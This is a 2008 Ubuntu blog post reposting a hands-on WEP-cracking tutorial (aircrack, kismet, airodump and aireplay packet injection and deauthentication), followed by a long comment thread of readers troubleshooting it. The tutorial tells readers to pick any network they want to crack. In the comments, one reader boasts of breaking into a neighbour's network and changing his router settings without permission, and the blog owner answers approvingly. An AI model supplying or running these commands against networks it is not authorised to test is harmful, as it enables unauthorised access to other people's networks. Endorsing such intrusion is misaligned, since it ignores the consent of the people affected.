Using Ubuntu to Crack WEP 02/26/08

Wireless pirateI was sent a great URL yesterday, that (in essence) was a hands-on guide to cracking WEP. Personally I question the ethics of such activities, however I’d also like to learn how this is done, so that I might further enhance the wifi security here. I’d like to adapt this to Feisty or Gutsy, so will be interesting to see new versions and how they stack up against those in the guide. Below is the actual guide from the original author (listed below). Make a backup, first, BEFORE you do any of this:

This post should enable anyone to get Linux up and running and crack a WEP key. It took me about 2 days and myriad tutorials to finally get this to work, and now that I have I feel that I should share it with everyone. I am by no means a Linux expert, but this works regardless. All you need is an old laptop with a wireless card and a copy of Ubuntu Linux, currently one of the most popular and easily installed distributions of linux. If you haven’t already bought a wireless card, you should select one from this list to save yourself some trouble.

First step, obviously, is to install Ubuntu. Just boot from the CD and follow the directions. This should be fairly straightforward and I’m not going to get into it any more than this. Once you have it installed and the layout and theme is how you want it, go on. But do everything in order, because otherwise it won’t really work.

Next step is to install the extra repositories and all the programs that Ubuntu doesn’t preinstall. Make sure your box can connect to the internet. If you can only connect via wireless and are having problems, there is a package called Wi-Fi radar that is helpful. To install the extra repositories, open a terminal window and type the following:

sudo cp /etc/apt/sources.list /etc/apt/sources.list_backup
sudo gedit /etc/apt/sources.list

While in the editor, replace everything with:

## Add comments (##) in front of any line to remove it from being checked.
## Use the following sources.list at your own risk.
deb http://archive.ubuntu.com/ubuntu dapper main restricted universe multiverse
deb-src http://archive.ubuntu.com/ubuntu dapper main restricted universe multiverse

## MAJOR BUG FIX UPDATES produced after the final release
deb http://archive.ubuntu.com/ubuntu dapper-updates main restricted universe multiverse
deb-src http://archive.ubuntu.com/ubuntu dapper-updates main restricted universe multiverse

## UBUNTU SECURITY UPDATES
deb http://security.ubuntu.com/ubuntu dapper-security main restricted universe multiverse
deb-src http://security.ubuntu.com/ubuntu dapper-security main restricted universe multiverse

## BACKPORTS REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.)
deb http://archive.ubuntu.com/ubuntu dapper-backports main restricted universe multiverse
deb-src http://archive.ubuntu.com/ubuntu dapper-backports main restricted universe multiverse

## PLF REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.)
deb http://packages.freecontrib.org/ubuntu/plf dapper free non-free
deb-src http://packages.freecontrib.org/ubuntu/plf dapper free non-free

Save the file and exit the text editor. Next type the command:

sudo apt-get update

Now we have to install the packages we’ll need later on:

sudo apt-get install build-essential
sudo apt-get install aircrack
sudo apt-get install kismet
sudo apt-get install airsnort
sudo apt-get install linux-source
sudo apt-get install linux-headers
sudo apt-get install sharutils

Next, you should update your entire system by going to the System Menu>Administration>Update Manager. Click ‘Check’ and begin installing updates. Then reboot your system. After this is done, it’s time to patch the Madwifi drivers.

This is where everything can be tricky. My wireless card (Linksys WPC55AG) uses the Atheros driver, which I needed to patch. If you have a different driver, you’re going to need to find out whether or not you need to patch your drivers, or if they’ll even work with the Aircrack suite. The forums at aircrack-ng.org are a good place to look and so is a google search. If you have an Atheros card, it will be called ath0 when you type iwconfig in the terminal window, or there will be a line that says Ethernet controller: Atheros Communications… when you type lspci in the terminal.

Let’s apply the madwifi patch which you’ll need if you’re using the Atheros driver. This will temporarily disable your wireless card when it deletes the old drivers of the disk. First we’re going to navigate to the /usr/src directory, download the new drivers, delete the old drivers, then install the new ones and apply the patch. You can just copy and paste the commands below into the terminal or type them yourself.

sudo -i

cd /usr/src
wget http://*******PLEASE SEE COMMENTS FOR URL’S*******
wget http://*******PLEASE SEE COMMENTS FOR URL’S*******

ifconfig ath0 down
rmmod ath_rate_sample wlan_wep ath_rate_onoe ath_pci wlan ath_hal
find /lib/modules -name ‘ath*’ -exec rm -v {} ;
find /lib/modules -name ‘wlan*’ -exec rm -v {} ;

tar zxvf madwifi-cvs-20051025.tar.gz
cd madwifi
patch -Np1 -i ../madwifi-cvs-20051025.patch
make && make install

modprobe ath_pci

UPDATE: Some people have been having problems with the modprobe command. A comment below contains a fix in some cases:

However, during Madwifi Installation I got this warning:

Warning: could not find /usr/src/madwifi/ath_hal/.hal.o.cmd for /usr/src/madwifi/ath_hal/hal.o

This warning can be IGNORED.

When I ran “modprobe ath_pci” it gave me an error message and “dmesg” gave me some gibberish about “disagrees about version of symbol”.

I browsed the web and found the solution: You have to delete the linux-restricted modules. Just search for “linux-restricted” in Synaptic. I removed everything but “linux-restricted-modules-common”. Then I compiled the madwifi again and ran “modeprobe ath_pci” again. NO ERROR this time! Authenticating and injecting works!

Karl, maybe you can add this to your tutorial cuz I did everything exactly as you wrote. Apparently some network cards with atheros chipset cause problems if you don’t remove the linux-restricdet-modules.

Thanks again!

Cheers,
mcgyver100

If you are using the Atheros driver, next we need to configure kismet to use the right source. If you are using another driver you’ll have to look up what syntax you use. First navigate to the Kismet config, then change the source line.

sudo gedit /etc/kismet/kismet.conf

Change the line that begins with ’source=’ to ’source=madwifi_ag,ath0,madwifi’. Now reboot the computer. After it boots back up you should be able to access the internet again via your wireless card.

Now we can begin cracking. Open up a terminal window, enter monitor mode, and run kismet.

sudo airmon start ath0
sudo kismet

Locate the wireless network you want to crack, and note its ESSID and channel. Then exit by pressing Ctrl-C.

Next, run airodump.

sudo airodump ath0 filename channel# 1

The one at the end lets Airodump know we only want to capture IV’s. The filename can be anything you want, and will be saved in your home directory (or whatever directory you run the command from) as filename.ivs.

Copy the bssid of the wireless network from the airodump window by selecting it and pressing Shift+Ctrl+C. Open up a new terminal window so we can run aireplay to start injecting packets so our data count goes up. We want the data column in airodump to reach between 100,000 and 400,000. The more packets we have, the faster aircrack can find the WEP key. If the WEP key is 128 bits, we may need up to 1,000,000 packets.

sudo aireplay -1 0 -e ESSID -a BSSID -h 0:1:2:3:4:5 ath0

This should associate the network with the wireless connection. If it times out repeatedly, you need to be closer to the wireless router or change your interface rate by typing ’sudo iwconfig ath0 rate 1M’.

Next we want to start injecting packets.

sudo aireplay -3 -b BSSID -h 0:1:2:3:4:5 ath0

At first, it will only read packets, and say 0 ARP requests and 0 packets sent. Just wait a minute or two and it will start sending packets in large quantities. If it returns text that says it has been deauthorized, press Ctrl+C and run the command again. You can try to speed things up by entering this command:

sudo aireplay -0 ath0 -a BSSID ath0

Otherwise just sit back and wait. As soon as packets begin to be sent, the data field in Airodump should start flying. Wait until the desired number of packets have been recieved, then open a new terminal window and run aircrack.

sudo aircrack filename.ivs

After a minute, aircrack should return the WEP key. If it doesn’t, collect more packets.

Published under a Creative Commons license by Karl Blitz

Update: Looking for compatible WiFi cards? Read here: http://ubuntulinuxhelp.com/how-to-setup-a-wireless-ubuntu-router/

Update: The locations of some packages have changed! Please see the comments section below to find where the packages are. Thanks.

Do you love to share?


You can leave a response, or trackback from your own site.

95 Responses to this article

 
JC256 February 26, 2008 Reply

Would also be nice if there were a list of wifi cards that work with Ubuntu. Anyone have one?

 
 
UbuntuLinuxHelp February 26, 2008 Reply
 
 
dizzy February 6, 2012

you can try using ndiswrapper to use the windows drivers for your current wireless card

 
UbuntuLinuxHelp February 26, 2008 Reply

Also…

WiFi Radar Feisty:
http://packages.ubuntu.com/feisty/net/wifi-radar

WiFi Radar Gutsy:
http://packages.ubuntu.com/gutsy/net/wifi-radar

WiFi Radar Hardy:
http://packages.ubuntu.com/hardy/net/wifi-radar

I don’t see anything for Intrepid yet.

 
Sam March 29, 2008 Reply

thanks for posting this tutorial, im very new to ubuntu linux but i was keen to learn how to crack wepcodes. however i have encountered an issue. whe i type the command

sudo mousepad /etc/kismet/kismet.conf

it opens mousepad, but the only text in the document says “warning, you are using the root account and this may harm your system”

so i cannot edit the file.
i have to use mousepad rather than Gedit because im running ubuntu on an eeepc and it runs much better.

i would be grateful for any help you could provide and i look forward tohearing back from you soon.

Sam

 
 
UbuntuLinuxHelp March 29, 2008 Reply

@Sam – The warning command tells you that you are operating with administrative rights and therefore can edit files with those administrative rights. If you make a mistake or edit something that can damage your installation, you will be able to do that… Because you are doing so with full administrative rights. You can use all sorts of editors like vi, nano, etc. It does not have to be gedit.

I have often broken my system doing such things, so please be careful that you don’t do anything to break yours. The guide was posted as a learning tool. Therefore do NOT use it to do anything ethically wrong or illegal. I used it to crack my own WEP code and to show people why they should use stronger encryption (like WPA, etc.) and not use WEP.

 
Sam March 29, 2008 Reply

another issue that i have encountered is that neither of the links to the madwifi patches and packages work, could you prvide more up to date links?

thanks again,

Sam

 
 
UbuntuLinuxHelp March 29, 2008 Reply

@Sam – Thanks for letting me know. :)
The files are now here:

http://ubuntulinuxhelp.com/wep/madwifi-ng-r1679.patch
http://ubuntulinuxhelp.com/wep/madwifi-ng-r1679-20060707.tar.gz

So…

Instead of:

madwifi-cvs-20051025.tar.gz
madwifi-cvs-20051025.patch

Use…

madwifi-ng-r1679-20060707.tar.gz
madwifi-ng-r1679.patch

 
Vadim P. May 7, 2008 Reply

Could this guide be upgrades for Ubuntu 8.04 please? That repository isn’t available, and some programs are missing from the current ones…

 
UbuntuLinuxHelp May 7, 2008 Reply

@Vadim P. – Are you able to tell me which ones are missing? I might be able to track them down. Also, if you happen to be looking for:

madwifi-ng-r1679-20060707.tar.gz
madwifi-ng-r1679.patch

They are here:

http://ubuntulinuxhelp.com/wep/madwifi-ng-r1679.patch
http://ubuntulinuxhelp.com/wep/madwifi-ng-r1679-20060707.tar.gz

 
Vadim P. May 8, 2008 Reply

I’m on some intel card, so I don’t think I need the wifi patch. Just want to see if my card can do this to begin with :)

The missing program is “airsnort”, which I think is responsible for airmon and airodump, and I can’t run those commands.

 
 
UbuntuLinuxHelp May 8, 2008 Reply

@Vadim P. – Oh I see, okay, I will look later, but a quick link here: http://linux.softpedia.com/get/System/Monitoring/AirSnort-3454.shtml
Would compiling it help?
It has a quick blurb on that page about how to compile.
(I’ll look later anyway).
Thanks. :)

 
Gepetto June 16, 2008 Reply

For people having trouble with these commands on Hardy, all the commands listed here that start with “air” are part of the aircrack-ng package. As for wifiradar, it’s actually called wifi-radar in the repos. I don’t know about madwifi, I didn’t need it.

Thanks for the tut, using this was loads of fun. I kept telling my neighbor who works a lot from home that WEP is insecure, but he’d rather take his stupid tech guy’s word that it can’t be broken by current technology (d’oh!) so I grabbed his WEP key, accessed his router config and changed the ESSID to “insecure network”. That scared him into changing his encryption to WPA-PSK :)

I guess it was an illegal invasion since I didn’t get his permission (or even warn him), but it was all for the greater good, and it was really fun. Obviously I didn’t do anything to hurt his files or exploit his network.

 
 
UbuntuLinuxHelp June 18, 2008 Reply

@Gepetto – Well… that’s one way to show someone the truth of the matter! :)
For those who are interested in madwifi on Hardy (8.04), the info is here: https://help.ubuntu.com/community/WifiDocs/Driver/Madwifi#head-2a72fa3e31e1b7509b7b21bb1e2bdce8ee5ac782
I had fun playing too, so figured I’d post notes – That way I, or anyone, can come back later to refer to them.

 
Paulo June 16, 2008 Reply

I must be doing something wrong, but I can’t see what it is. Even after one hour of running aireplay, airodump has still connected only 11 packets from my AP, and aireplay shows 0 ARP, 0 ACK and 0 packets sent. What gives?

 
 
UbuntuLinuxHelp June 18, 2008 Reply

@Paulo – It that wireless card working properly? Are there any wireless networks in range?

 
Paulo June 18, 2008 Reply

Thanks but I already figured out the problem. Turns out this method only works when there’s another client connected to the network. There’s a tutorial on aircrack-ng.org for obtaining a PRGA and cracking the network even without connected clients: http://www.aircrack-ng.org/doku.php?id=how_to_crack_wep_with_no_clients

It’s the same method with a few extra steps in the beginning. Worked like a charm.

 
stephen June 28, 2008 Reply

do you plan on updating this tutorial for hardy? please let me know

 
 
UbuntuLinuxHelp June 30, 2008 Reply

@stephen – I’d like to update it; maybe after the LAMP server series is finished. (Timing is a bit tight right now). If you have some input, feel free to let me know. ;)
Thanks!

 
KuroYoma October 9, 2008 Reply

I have a problem. When i use aircrack-ng on the dump*.cap file i get a key but when i use the key it doesn’t work. Is there anything else i have to use on the key it gives to make it work.

aircrack-ng -a 1 -f 10 -s dump*.cap

This is the line i use.

 
 
UbuntuLinuxHelp October 11, 2008 Reply

@KuroYoma – Hmmm… Are you sure the key is correct? What version of Linux are you using? This post is for versions before Hardy (Ubuntu Linux). I’ve not played with this for about a year (almost), so would have to reinstall the applications and play…

I do know that to get it to work, you’d have to capture a large number (thousands) of IV’s (initialization vectors). Please remember that normal network traffic is probably not going to generate them very quickly. So… aireplay-ng generates them quicker by doing fake authentication. Then airodump-ng is done on the wireless channel (with a bssid filter) to catch the IV’s (new and unique ones). Then aireplay-ng (in ARP request mode) to inject packets (keep resending packets rapidly). Then finally running aircrack-ng to get the key. Perhaps you need more IV’s (Just a thought as I’ve not done this in a long time).

Hopefully the above might help clarify a bit more? I hope so. :)

 
xtremeshadow3 October 25, 2008 Reply

I’m able to download the patch from a link in google, but I can’t seem to get the other file anywhere. All of the sites that list it point to a dead link. Is anyone else having this problem?

 
 
UbuntuLinuxHelp October 25, 2008 Reply

@xtremeshadow3 – Oh… which links are dead? (Let me know and I’ll try to revive them).
Thanks.

 
heya October 26, 2008 Reply

heya i am new in ubuntu and i managed to advance untill the part of ..

sudo -i

cd /usr/src
wget http://syserr.com/stuff/madwifi-cvs-20051025.tar.gz
wget http://syserr.com/stuff/madwifi-cvs-20051025.patch

ifconfig ath0 down
rmmod ath_rate_sample wlan_wep ath_rate_onoe ath_pci wlan ath_hal
find /lib/modules -name ‘ath*’ -exec rm -v {} ;
find /lib/modules -name ‘wlan*’ -exec rm -v {} ;

tar zxvf madwifi-cvs-20051025.tar.gz
cd madwifi
patch -Np1 -i ../madwifi-cvs-20051025.patch
make && make install

modprobe ath_pci

then i get trouble i tried changing links with the ones that are on the comments but i dont know what might be wrong

can anyone put that comand just how it should be?

 
 
UbuntuLinuxHelp October 27, 2008 Reply

@heya – Not sure which links, do you means these ones? (Below). If so, this should be the command:

wget http://ubuntulinuxhelp.com/wep/madwifi-ng-r1679.patch
wget http://ubuntulinuxhelp.com/wep/madwifi-ng-r1679-20060707.tar.gz
:)

 
heya October 26, 2008 Reply

i also got another problem while typing this comand
sudo apt-get install linux-headers
i get a message that says
needs to select explicitly one to install.
The package linux-headers does not have candidate for installation

well it says something like that my ubuntu is in spanish so i translated that

 
 
UbuntuLinuxHelp October 27, 2008 Reply

@heya – What version of Linux (Ubuntu) are you using? Are you running it virtual – Like VMware? If so…

Ubuntu Linux will tell you that the linux-headers is a virtual package and that you need to explicitly pick an installation candidate (as there was no candidate specified). The candidates will be listed, and you can pick the package that looks something like “linux-headers-x.x.xx-xx-xxxxxx”. Then after selecting the one you want, you can install the package by using the command that looks something like below:

sudo apt-get install linux-headers-x.x.xx-xx-xxxxxx

If I remember correctly, this will install a couple of packages (well, at least on a Linux, Ubuntu server I think it would. The “headers” and the headers for “server”.

Also, you can remove headers later (if needed) by a command similar to below:

sudo dpkg –purge linux-headers-x.x.xx-xx linux-headers-x.x.xx-xx-xxxxxx

I hope this helps you in some way. :)

 
Pretender January 13, 2009 Reply

Hi!

Some of the links for updating are broken. Care to update? ;)

 
 
UbuntuLinuxHelp January 14, 2009 Reply

@Pretender – Thanks for the heads-up. I appreciate that. I did try a couple and they worked. Which links are broken? – And I’ll try to get them fixed for you.

 
djben75 February 27, 2009 Reply

after i tried this, no wirless networks show up in my network manager! I tried many things already including uninstalling all the packages and nothing seems to work! I am fairly new to linux, is there something i am missing? (I am using intrepid) Please help!!

 
 
UbuntuLinuxHelp February 27, 2009 Reply

@djben75 – If no wireless connections show up, maybe it’s because none are in range? As you were able to connect to this blog, I’m assuming that your NIC is working, right?

 
ChaosX March 3, 2009 Reply

Hey Guys,
I cannot get any of the links to work for the madwifi/patches could anyone give an update on the location. I cannot find the newest ones or any of the older ones for that matter. Thanks

 
UbuntuLinuxHelp March 3, 2009 Reply

@ChaosX – Which patches? There are a couple links in the comments. If you let me know which file (patch) your’re looking for, maybe we can post the link.

 
ChaosX March 4, 2009 Reply

wget http://syserr.com/stuff/madwifi-cvs-20051025.tar.gz
wget http://syserr.com/stuff/madwifi-cvs-20051025.patch

are the 2 files I need that I cannot find and the ones listed are out of date or not up. Thanks in advance

 
 
UbuntuLinuxHelp March 5, 2009 Reply

@ChaosX – There are links to the files in the comments, try those instead. Keep in mind that these files are now old and obsolete.

You’ll find newer files here: http://sourceforge.net/projects/madwifi/ (mentioned in comments too I think?)

If you must have the old ones, try going direct to Madwifi (madwifi.net) – Try this directory: http://www.madwifi.net/Downloads/1.SourceForge.Madwifi.Drivers/ Oh… and before I forget to type it, you may want to check here: http://madwifi.org/

Hopefully one of these links helped you out? – Cheers!

 
Steve Pockspen April 22, 2009 Reply

No airsnort.

 
 
UbuntuLinuxHelp April 26, 2009 Reply

@Steve Pockspen – You can get the .deb package here: http://linux.softpedia.com/progDownload/AirSnort-Download-3454.html :)

 
bob marley May 16, 2009 Reply

i tried this aircrack-ng suite and now i cant use my wireless nic… its disabled or something and i dont know how to turn it back on properly.

right now im connected via wireless usb adapter, i just happen to have one or id be really screwed.

any help getting my internal wireless card back up and running would be greatly appreciated.

thanks

 
 
UbuntuLinuxHelp May 16, 2009 Reply

@bob marley – There’s two easy ways to do this.

1) Restore (copy back) the files/settings you backed up.
2) Remove any packages you installed and put your original settings back.

I find I always have to backup some of my files and write my settings down. That way I can always go back to my original system. If I don’t do that, I find I always end up in trouble.

I hope one of the above two steps should get you going again, as I have no idea what system you’re running, hardware, etc.

 
 
UbuntuLinuxHelp May 16, 2009 Reply

@bob marley – Have you looked here? -> aircrack-ng, where it says “…most common cause is that a connection manager is running on your system and takes the card out of monitor mode. This is a very common problem especially with the Ubuntu distribution. Be sure to stop all connection managers prior to using the aircrack-ng suite. Use “killall NetworkManager && killall NetworkManagerDispatcher” to do this. As well, make sure that wpa_supplicant is not running. Another potential cause is the PC going to sleep due to power saving options. Check your power saving options. The madwifi-ng driver for the atheros chipset contains a bug in releases up to r2830 which causes airodump-ng in channel hopping mode to stop capturing data after a few minutes. The fix is to use r2834 or above of the madwifi-ng drivers…”

 
bob marley May 17, 2009 Reply

@ubuntulinuxhelp

lol, restore or copy back files/settings?

i didnt back up files or settings, i was just blindly following the instructions. i am a total noob at ubuntu and i have the 64 jaunty version. also im not using using the madwifi-ng driver, i saw it when i had to activate my graphics card driver, but i didnt activate it… should i be using the madwifi-ng driver?

anyways, i eventually re-installed the operating system and it is working again but i would like to try to run the aircrack suite again but this time back up files/settings first…. so how do i go about doing that?

thanks in advance.

also my computer is a hp pavilion dv7-1135nr

 
Pham June 5, 2009 Reply

Hi all,
I did the following command

sudo apt-get install build-essential
sudo apt-get install aircrack
sudo apt-get install kismet
sudo apt-get install airsnort
sudo apt-get install linux-source
sudo apt-get install linux-headers
sudo apt-get install sharutils

but I could not install aircrack and airsnort. Because it saids “Couldn’t find packet aircrack”. Similar to airnort.

Please let me know how to do ?

Thanks in advance.

 
UbuntuLinuxHelp June 5, 2009 Reply

@Pham

Try aircrack for Hardy (8.04) here: http://packages.ubuntu.com/hardy/aircrack-ng

and airsnort for Hardy (8.04) here: https://launchpad.net/ubuntu/hardy/+package/airsnort

I hope they help, please let me know – Thanks.

 
Pham June 5, 2009 Reply

thank you, but I am so sory. Currently, my pc is runing on Ubuntu 9.04. Please help me !

Thanks in advance.

 
 
UbuntuLinuxHelp June 5, 2009 Reply

@Pham

Okay… Here is aircrack for Jaunty (9.04): https://launchpad.net/ubuntu/jaunty/+source/aircrack-ng/1:1.0~rc3-1

Or you could just try sudo aptitude install aircrack-ng

I’ve not played with this in over a year now (so might be a bit out of touch), But I don’t think airsnort is supported in Jaunty. You can try keeping an eye on http://www.getdeb.net/ and if airsnort ever does get in the Jaunty repositories, the package might be called airsnort-ng

Also, have you tried this to clean out any issues:

sudo apt-get install -f
sudo dpkg --configure -a
sudo apt-get update
sudo apt-get upgrade
sudo apt-get autoclean

 
Balam August 4, 2009 Reply

I have done the tutorial all the way, step by step, and I get this any idea how to fix this?

khanbalam@Bactery:~$ sudo kismet
Launching kismet_server: //usr/bin/kismet_server
Suid priv-dropping disabled. This may not be secure.
No specific sources given to be enabled, all will be enabled.
Non-RFMon VAPs will be destroyed on multi-vap interfaces (ie, madwifi-ng)
Enabling channel hopping.
Enabling channel splitting.
NOTICE: Disabling channel hopping, no enabled sources are able to change channel.
Source 0 (madwifi): Enabling monitor mode for madwifi_ag source interface wlan0 channel 6…
ERROR: Unable to create VAP: Operation not supported
ERROR: Unable to create monitor-mode VAP
WARNING: wlan0 appears to not accept the Madwifi-NG controls. Will attempt to configure it as a standard Madwifi-old interface. If you are using madwifi-ng, be sure to set the source interface to the wifiX control interface, NOT athX
FATAL: Failed to retrieve list of private ioctls 95:Operation not supported
Done.

 
UbuntuLinuxHelp August 7, 2009 Reply

Looks like your answer is in the output:

@Balam

Looks like your answer is in the output (copied below):
“…
ERROR: Unable to create VAP: Operation not supported
ERROR: Unable to create monitor-mode VAP
WARNING: wlan0 appears to not accept the Madwifi-NG controls. Will attempt to configure it as a standard Madwifi-old interface. If you are using madwifi-ng, be sure to set the source interface to the wifiX control interface, NOT athX
FATAL: Failed to retrieve list of private ioctls 95:Operation not supported
…”

Maybe check your wireless hardware, looks like the wireless NIC does not support the features?

 
Zach August 31, 2009 Reply

Would it be possible to get the driver and patch links for a Broadcom BCM4311 (rev. 02) card?

 
Jack September 24, 2009 Reply

sudo airmon start eth1
-e
usage: /usr/sbin/airmon [channel]

-e Interface Chipset Driver

eth1 Unknown Unknown

i have a broadcom BCM 4312 card and please tell me do i need to patch it first….cause from the point of patching,i am unable to make out what to do…..

 
Jack September 24, 2009 Reply

mohammad@mohammad-laptop:~$ sudo kismet
Server options: none
Client options: none
Starting server…
Waiting for server to start before starting UI…
Suid priv-dropping disabled. This may not be secure.
No specific sources given to be enabled, all will be enabled.
Enabling channel hopping.
Enabling channel splitting.
FATAL: Unknown capture source type ‘bcm4312′ in source ‘bcm4312,eth1,broadcom’
[1] + Done(1) ${BIN}/kismet_server –silent ${server}

 
lejoy george November 28, 2009 Reply

when i tried to download the patch for etheros driver its show this msg same the case with the driver some one help me out pls……..

root@lejoy-desktop:/usr/src# wget http://ubuntulinuxhelp.com/wep…..1679.patch
–2009-11-28 15:17:14– http://ubuntulinuxhelp.com/wep…..1679.patch
Connecting to ubuntulinuxhelp.com… connected.
HTTP request sent, awaiting response… 403 Forbidden
2009-11-28 15:17:18 ERROR 403: Forbidden.

 
 
UbuntuLinuxHelp November 28, 2009 Reply

@lejoy george

wget is denied because of abuse.

One way is to download via FTP instead:

ftp://ubuntulinuxhelp.com/wep/madwifi-ng-r1679.patch
ftp://ubuntulinuxhelp.com/wep/madwifi-ng-r1679-20060707.tar.gz

 
Heero Yuy December 2, 2009 Reply

Tried your FTP links above with wget and doesn’t work…
Tried using Firefox too, but it just downloads a 0 byte file :(

 
 
UbuntuLinuxHelp December 2, 2009 Reply

@Heero Yuy

Okay, I just tried too, seems like security again. Maybe I’ll send them to another server and post links here. Give me a few minutes.

Thanks for the heads up.

 
Heero Yuy December 2, 2009 Reply

No problem, waiting for your links ;)

 
 
UbuntuLinuxHelp December 2, 2009 Reply

@Heero Yuy

Will take a bit longer than I thought. I tried to use my Launchpad account, but it’s a nightmare to try and use. (The instructions are no help). I can’t even delete PPAs!!
So… I have to try and find another place that is user friendly.

 
 
UbuntuLinuxHelp December 2, 2009

The madwifi files are now stored in an archive on Ubuntu’s Dropbox at: http://dl.dropbox.com/u/3306550/madwifi.zip

 
curious1 January 24, 2010 Reply

would anyone be willing to update this entire tutorial for 2010 (with updated links)? I’ve read every single comment on this page, and while some of it is helpful, and all of you try to help, it seems like the links are still outdated (error, forbidden, etc.). I was originally following the tutorial here; http://www.askstudent.com/hacking/how-to-crack-a-wep-key-using-ubuntu/ but it is rather outdated. I then stumbled upon this site, which is a bit more updated, but not enough for a newbie (like me) to get the hang of this stuff. I have setup a laboratory environment for this test and would love to be able to do conduct this test and then demonstrate it to my fellow graduate students (we are taking a hacking & defense course elective). Thank you all in advance.

 
vili March 15, 2010 Reply

i can’t find madwifi-ng-r1679.patch!!!!!! please heeeeeeelp!!!

 
 
UbuntuLinuxHelp April 3, 2010 Reply

@vili

I Googled it and found the patch here: http://patches.aircrack-ng.org/old/

I should also add the (working) link to the file is also in the comments above.

 
YesYes March 22, 2010 Reply

@Curious1: Did you find an updated manual? I’m rather interested 2.

Thanks

 
Nicahlos Nelson March 30, 2010 Reply

Hi, can you please make video with the steps while you do it so I can better understand how to crack wep in xubuntu and email the video to me? I have a yagi antenna in which uses Realtek (RTL8187 wireless). Please help me! Do I need to install xubuntu or can use it as try it for crack the wep? cause I windows 7 on my computer and when I try to install xubuntu it wont let it boot, only just boot to windows 7 and it may seem my machines doesn’t support dual boot.

 
 
UbuntuLinuxHelp April 3, 2010 Reply

@Nicahlos Nelson

Sorry, I don’t make videos and email them (there’s not enough tiome for me to do such things).
You can install any Ubuntu version you wish.

To dual boot with Windows7, you should follow a guide for that perhaps? http://www.bauer-power.net/2009/06/how-to-dual-boot-windows-7-and-ubuntu.html

 
EnzoA June 24, 2010 Reply

Hey. i’m new to linux. i was really interrested in trying out the tutorial, but i got discouraged after seeing all this code. happens often.
so instead of rushing blind into things i would like it if you had some reading/tutorial material on how to become a linux programmer or something like that. do i need to learn other languages first like C or Phyton or something, a curriculum. or just a book title to start my foundation.
thanks.

 
 
UbuntuLinuxHelp June 29, 2010 Reply

@EnzoA

Have you tried this publication? –> http://ubuntu-manual.org/
Or… this wiki? –> http://ubuntuguide.org/wiki/Ubuntu:Lucid

 
snicka August 13, 2010 Reply

would the first set of commands work in any other distribution of linux? (backtrack)

 
jerry kovis September 2, 2010 Reply

uh, so i tried this tutorial but failed. i got as far replacing everything in the editor with what it says to replace it and then i saved it. then when i tried to open “update manager” and get this message…

An unresolvable problem occurred while initializing the package information.

Please report this bug against the ‘update-manager’ package and include the following error message:

‘E:Type ‘multiverse’ is not known on line 7 in source list /etc/apt/sources.list, E:The list of sources could not be read.’

…i’m pretty new to all this and tried to resolve this issue with no avail. basically, i’d like to replace what i replaced with whatever was there originally. does anyone the source for this info?

thanks in advance and if i stall try this out

-j

 
 
UbuntuLinuxHelp September 2, 2010 Reply

@jerry kovis

That post was written for Dapper Drake (6.06LTS). Which version of Ubuntu are you using?
Thanks.

 
 
UbuntuLinuxHelp November 19, 2010 Reply

@jerry kovis

Please just restore the sources.list from your backup. Then run the command:

apt-get update

or

aptitude update

Note: That’s why the post says

“…Make a backup, first, BEFORE you do any of this…”

 
alex September 3, 2010 Reply

this works with ubuntu 10.04?

 
 
UbuntuLinuxHelp September 3, 2010 Reply

@alex

Nope. :( I still have to get there, bloggingwise. (This one was written a while back).

 
 
UbuntuLinuxHelp November 19, 2010 Reply

@alex

That post was for Dapper (as mentioned in the content), which is 6.06. ;)

 
jerry kovis September 4, 2010 Reply

@UbuntuLinuxHelp

thank for the timely reply. i am using 10.04. i found a partial “default” source list and was able to get update manager working again.

i’m gonna check the link you posted.

thanks again and looking forward to updated tutorial.

-j

 
 
UbuntuLinuxHelp September 4, 2010 Reply

@jerry kovis

Thanks.
Have a good one!

 
Arjan rimal November 11, 2010 Reply

I need to crack my wireless password (of course for learning purpose)
I need help!!!!!
These are the things i did:

******************************
With my wireless on………
1. root@arjan:~# sudo airmon-ng stop wlan0

Interface Chipset Driver

eth1 Unknown wl

************************************

2. root@arjan:~# sudo ifconfig eth1 down

**********************************
3.root@arjan:~# sudo macchanger –mac 00:11:22:33:44:55 eth1
Current MAC: 00:21:00:63:35:a6 (unknown)
ERROR: Can’t change MAC: interface up or not permission: Too many open files in system
*********************************************
As my mac didnt changed. I repeated the command again.

4.root@arjan:~# sudo macchanger –mac 00:11:22:33:44:55 eth1
Current MAC: 00:11:22:33:44:55 (Cimsys Inc)
ERROR: Can’t change MAC: interface up or not permission: Too many open files in system

As you can see my mac changed. But it is showing some errors (interface up??)
************************************************** *******

5.root@arjan:~# sudo airmon-ng start eth1

Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
963 NetworkManager
966 avahi-daemon
969 avahi-daemon
1097 wpa_supplicant

Interface Chipset Driver

eth1 Unknown wl (monitor mode enabled)

************************************************** *******

6.root@arjan:~# sudo airodump-ng eth1
ioctl(SIOCSIWMODE) failed: Invalid argument

ARP linktype is set to 1 (Ethernet) – expected ARPHRD_IEEE80211,
ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead. Make
sure RFMON is enabled: run ‘airmon-ng start eth1 ‘
Sysfs injection support was not found either.

**************

I am stuck here.
I havent patched my drivers yet. I googled it. but found nothing.
Can you help me step by step………… Please…………

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
when i run iwconfig:
root@arjan:~# iwconfig
lo no wireless extensions.

eth0 no wireless extensions.

eth1 IEEE 802.11bg ESSID:”"
Mode:Managed Frequency:2.457 GHz Access Point: Not-Associated
Bit Rate:54 Mb/s Tx-Power:24 dBm
Retry min limit:7 RTS thrff Fragment thrff
Encryption keyff
Power Managementmode:All packets received
Link Quality=5/5 Signal level=0 dBm Noise level=0 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

ppp0 no wireless extensions.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
when i run
root@arjan:~# sudo lshw -C network
*-network
description: Wireless interface
product: BCM4312 802.11b/g LP-PHY
vendor: Broadcom Corporation
physical id: 0
bus info: pci@0000:03:00.0
logical name: eth1
version: 01
serial: 00:11:22:33:44:55
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=wl0 driverversion=5.60.48.36 latency=0 wireless=IEEE 802.11bg
resources: irq:18 memory:99700000-99703fff
*-network
description: Ethernet interface
